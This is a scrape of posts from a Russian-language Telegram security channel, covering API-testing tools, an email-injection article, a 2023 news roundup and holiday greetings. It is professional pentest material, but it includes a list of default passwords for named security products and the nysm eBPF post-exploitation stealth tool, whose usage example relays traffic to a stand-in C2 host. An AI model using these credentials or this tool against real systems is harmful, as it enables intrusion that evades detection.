#linux #LPE
Если кратко, то скрипт на PowerShell парсит логи на наличие данных авторизации. На первый взгляд классная штука.
Как получится воспользоваться на проекте, отпишу фидбек)
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥9❤1 1
Forwarded from Blue (h/c)at Café (Женя Белкин '";DROP DATABASE db_name();--)
Продолжаем разговор про тестирование API. На этот раз не будет докера, мне было максимально лениво разбираться с Rust
Инструмент, которым я буду сам пользоваться называется CherryBomb.
- Написан на Rust
- Имеет варианты запуска (info, normal, intrusive(не работает) , passive, full
- Требуется файл OpenAPI v3 в формате json (можете ваши yml переводить в него тут)
📌
Тестирование проводил всё на том же VAmPI
cherrybomb --file openapi.json --profile full --ignore-tls-errors true -o report.json --format json
Жаль, что я не могу делать развёрнутые посты с несколькими скринами и подобным, но если кратко - умеет в читаемый вид (table), а также в формате json
📌
В скором времени напишу парсер в sarif или для defect dojo
#opensource #devsecops
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12❤2 2
Forwarded from PRO:PENTEST
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥17 2⚡1
Forwarded from BI.ZONE Bug Bounty
Мы думали-думали, что же такое особенное подарить нашей десятке лучших... А потом как придумали! На двух загадочных фото в посте — подсказка ;)
А это список самых крутых багхантеров на нашей платформе в 2023 году:
Хотим сказать спасибо всем, кто упорно багхантил на платформе весь год и поддерживал нас.
А всех из десятки от души поздравляем, в ближайшее время свяжемся и отправим подарки.
Stay tuned!
UPD
arkiix влетел в рейтинг уже после подведения итогов, так что наш топ-10 магией Деда Мороза превратился в топ-11. Так держать!
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10❤🔥1🎄1 1
E-mail Injection; Инъекции в почтовую функциональность веб-приложений
Порой разработчикам необходимо создавать формы – разделы для сбора информации от пользователей веб-приложения. Было придумано множество способов обработки и сбора ответов пользователей на формы. Выбор подходящего зависит от спектра условий: вида и предполагаемого объёма данных, допустимого объёма выделенного хранилища, желаемых характеристик доступа, ... ;
Так сложилось, что одним из вариантов решения упомянутой задачи является использование электронной почты. Электронная почта – комплексная технология, в работе которой задействован целый список компонентов.
👉 Сохраняй
🌚 @poxek
Порой разработчикам необходимо создавать формы – разделы для сбора информации от пользователей веб-приложения. Было придумано множество способов обработки и сбора ответов пользователей на формы. Выбор подходящего зависит от спектра условий: вида и предполагаемого объёма данных, допустимого объёма выделенного хранилища, желаемых характеристик доступа, ... ;
Так сложилось, что одним из вариантов решения упомянутой задачи является использование электронной почты. Электронная почта – комплексная технология, в работе которой задействован целый список компонентов.
Please open Telegram to view this post
VIEW IN TELEGRAM
GIGANEWS. Главные события 2023 года по версии «Хакера»
Год подходит к концу, некоторые уже начинают резать салаты, а значит, пришло время оглянуться назад и вспомнить самые важные, интересные и забавные события, которыми он нам запомнится. По традиции мы составили для тебя подборку наиболее ярких взломов, атак, уязвимостей, фейлов и других событий уходящего 2023 года. Будет интересно, погнали!
В статье подвели итоги по следующим аспектам:
- Атака года
- Уязвимость года
- Утечка года
- Исследование года
- Блокировка года
- Нарушитель приватности года
- Малварь года
- Хардверный взлом года
- Странность года
- Фейл года
- Хайп года
👉 Очень советую прочитать тем, кто особо не следил за ИБ новостями.
🌚 @poxek
Год подходит к концу, некоторые уже начинают резать салаты, а значит, пришло время оглянуться назад и вспомнить самые важные, интересные и забавные события, которыми он нам запомнится. По традиции мы составили для тебя подборку наиболее ярких взломов, атак, уязвимостей, фейлов и других событий уходящего 2023 года. Будет интересно, погнали!
В статье подвели итоги по следующим аспектам:
- Атака года
- Уязвимость года
- Утечка года
- Исследование года
- Блокировка года
- Нарушитель приватности года
- Малварь года
- Хардверный взлом года
- Странность года
- Фейл года
- Хайп года
Please open Telegram to view this post
VIEW IN TELEGRAM
Не ну вы поняли)
Новые программы для тех, кто не собирается отдыхать на новогодние праздники
🌚 @poxek
Новые программы для тех, кто не собирается отдыхать на новогодние праздники
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Android Security & Malware
Android Deep Links exploitation
https://z4ki.medium.com/android-deep-links-exploitation-4abade4d45b4
https://z4ki.medium.com/android-deep-links-exploitation-4abade4d45b4
Medium
Android Deep Links exploitation
Recently, I have been studying Android penetration testing, and I came across a new topic called ‘Deep Links’. Since it is a new topic to…
В следующем году постарается сделать как минимум х1.5, а то и больше!!
А также +3.5к подписчиков на канале, то бишь канал за этот год вырос в более чем 2 раза. Всем спасибо, что вы были этот год со мной. Следующий год обещает быть ещё более взрывным!!
Please open Telegram to view this post
VIEW IN TELEGRAM
❤25❤🔥8🔥4 3👏1
Похек
Меня тут поправили. Не в 2 раза канал вырос, а в 6 раз практически 😁
☃14 4🎄3 1
Новые партнёрства, постараюсь выступать почаще (если буду успевать готовить темы), прогрессивный рост канала, улучшение контента: постараюсь делать контент одновременно для начинающих ребят и для тех, кто уже разбираются.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤25 7🔥6🎄4❤🔥2 2⚡1
Всех поздравляю с Новым Годом!!
🌲 🌲 🌲 🌚 🌚 🌚 💰 💰 🎁 🎁
Please open Telegram to view this post
VIEW IN TELEGRAM
❤39🔥10☃6🎄4 1
Forwarded from true_security
на пентестах бывают случаи когда компрометация происходит через средства обнаружения атак и средства защиты....далеко не все фильтруют сетевой доступ к компонентам СЗИ.
Так сказать, спасибо за дефолтные пароли:
Докидывайте дефолтные пароли сзи в комментах)
Так сказать, спасибо за дефолтные пароли:
- rvision soar/deception/etc... ssh root:pxtm0222; postgres rvision:pxtm0222
- maxpatrol VM: Administrator:P@ssw0rd
- maxpatrol siem: Administrator:P@ssw0rd; rabbitmq: siem:P@ssw0rd или mpx_siem:P@ssw0rd
- pt xdr: Administrator:P@ssw0rd
- pt nad: administrator:P0sitive или administrator:Administr@t0r
- security vision soar: postgres postgres:1q2w#E$R
- kuma (kaspersky siem): admin:mustB3Ch@ng3d!
Докидывайте дефолтные пароли сзи в комментах)
🔥12 2
Please open Telegram to view this post
VIEW IN TELEGRAM
❤38🔥13🎉8❤🔥1
Please open Telegram to view this post
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
🔴 nysm
Скрытый контейнер для постэксплуатации
#eBPF #offensive
С ростом популярности offensive инструментов, основанных на eBPF, начиная от кражи учетных данных и заканчивая руткитами, скрывающими свой собственный PID, авторам пришел в голову вопрос: Можно ли сделать eBPF невидимым в глазах админа? В результате они создали nysm, eBPF stealth контейнер, предназначенный для того, чтобы сделать инструменты атакующих незаметными для системных администраторов, не только скрывая eBPF, но и многое другое:
- bpftool
- bpflist-bpfcc
- ps
- top
- sockstat
- ss
- rkhunter
- chkrootkit
- lsof
- auditd
- и другое
Как это работает?
Установка:
Использование:
👉 https://github.com/eeriedusk/nysm
🌚 @poxek
Скрытый контейнер для постэксплуатации
#eBPF #offensive
С ростом популярности offensive инструментов, основанных на eBPF, начиная от кражи учетных данных и заканчивая руткитами, скрывающими свой собственный PID, авторам пришел в голову вопрос: Можно ли сделать eBPF невидимым в глазах админа? В результате они создали nysm, eBPF stealth контейнер, предназначенный для того, чтобы сделать инструменты атакующих незаметными для системных администраторов, не только скрывая eBPF, но и многое другое:
- bpftool
- bpflist-bpfcc
- ps
- top
- sockstat
- ss
- rkhunter
- chkrootkit
- lsof
- auditd
- и другое
Как это работает?
Поскольку eBPF не может перезаписывать возвращаемые значения или адреса ядра, наша цель - найти вызов самого низкого уровня, взаимодействующий с адресом пользовательского пространства, чтобы перезаписать его значение и скрыть нужные объекты. Чтобы отличить события nysm от других, все выполняется в отдельном пространстве имен PID.
Установка:
sudo apt install git make pkg-config libelf-dev clang llvm bpftool -y; git clone https://github.com/eeriedusk/nysm; cd nysm; bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h; make
Использование:
Usage: nysm [OPTION...] COMMAND
Stealth eBPF container.
-d, --detach Run COMMAND in background
-r, --rm Self destruct after execution
-v, --verbose Produce verbose output
-h, --help Display this help
--usage Display a short usage message
# Примеры
./nysm bash
./nysm -r ssh user@domain
./nysm -dr socat TCP4-LISTEN:80 TCP4:evil.c2:443
Please open Telegram to view this post
VIEW IN TELEGRAM
❤12 3 3😎1